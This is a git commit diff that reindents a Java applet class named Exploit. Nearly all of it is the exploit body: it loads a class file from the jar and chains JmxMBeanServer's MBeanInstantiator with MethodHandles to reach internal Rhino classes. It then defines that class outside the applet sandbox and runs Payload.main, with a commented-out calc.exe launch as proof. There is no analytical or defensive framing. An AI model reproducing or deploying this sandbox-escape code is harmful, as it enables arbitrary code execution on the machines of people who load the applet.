code indention for exploit.java fixed
parent
876d889d82
commit
e503d596ed
|
@ -27,40 +27,40 @@ public class Exploit extends Applet
|
|||
{
|
||||
try
|
||||
{
|
||||
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
||||
byte[] buffer = new byte[8192];
|
||||
int length;
|
||||
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
||||
byte[] buffer = new byte[8192];
|
||||
int length;
|
||||
|
||||
// read in the class file from the jar
|
||||
InputStream is = getClass().getResourceAsStream("B.class");
|
||||
// and write it out to the byte array stream
|
||||
while( ( length = is.read( buffer ) ) > 0 )
|
||||
bos.write( buffer, 0, length );
|
||||
// convert it to a simple byte array
|
||||
buffer = bos.toByteArray();
|
||||
|
||||
JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
|
||||
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
|
||||
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
|
||||
ClassLoader a = null;
|
||||
Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
|
||||
Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
|
||||
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
|
||||
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
|
||||
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
|
||||
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
|
||||
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
|
||||
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
|
||||
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
|
||||
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
|
||||
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
|
||||
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
|
||||
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
|
||||
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
|
||||
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
|
||||
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
|
||||
localClass3.newInstance();
|
||||
|
||||
// read in the class file from the jar
|
||||
InputStream is = getClass().getResourceAsStream("B.class");
|
||||
// and write it out to the byte array stream
|
||||
while( ( length = is.read( buffer ) ) > 0 )
|
||||
bos.write( buffer, 0, length );
|
||||
// convert it to a simple byte array
|
||||
buffer = bos.toByteArray();
|
||||
|
||||
JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
|
||||
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
|
||||
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
|
||||
ClassLoader a = null;
|
||||
Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
|
||||
Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
|
||||
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
|
||||
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
|
||||
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
|
||||
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
|
||||
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
|
||||
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
|
||||
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
|
||||
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
|
||||
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
|
||||
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
|
||||
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
|
||||
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
|
||||
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
|
||||
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
|
||||
localClass3.newInstance();
|
||||
|
||||
Payload.main(null);
|
||||
//Runtime.getRuntime().exec("calc.exe");
|
||||
}
|
||||
|
|